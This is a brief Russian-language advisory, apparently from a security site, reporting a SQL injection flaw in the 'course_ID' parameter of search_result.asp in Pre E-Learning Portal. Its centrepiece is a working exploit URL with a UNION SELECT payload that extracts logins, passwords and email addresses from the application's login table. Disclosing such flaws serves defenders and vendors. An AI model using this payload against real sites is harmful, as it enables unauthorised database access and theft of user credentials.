Программа: Pre E-Learning Portal

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре "course_ID" сценарем search_result.asp
(когда "courses" установлен). Удаленный пользователь может с помощью специально
сформированного запроса выполнить произвольные SQL команды в базе данных
приложения.

Эксплоит:

http://www.preprojects.com/elearning/search_result.asp?courses=1&course_ID=194+

and+1=0+union+all+select+1,(login%2B’:’%2Bpassword%2B’:’%2Bemail),3,4,5,6,

7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+from+[login]#

Оставить мнение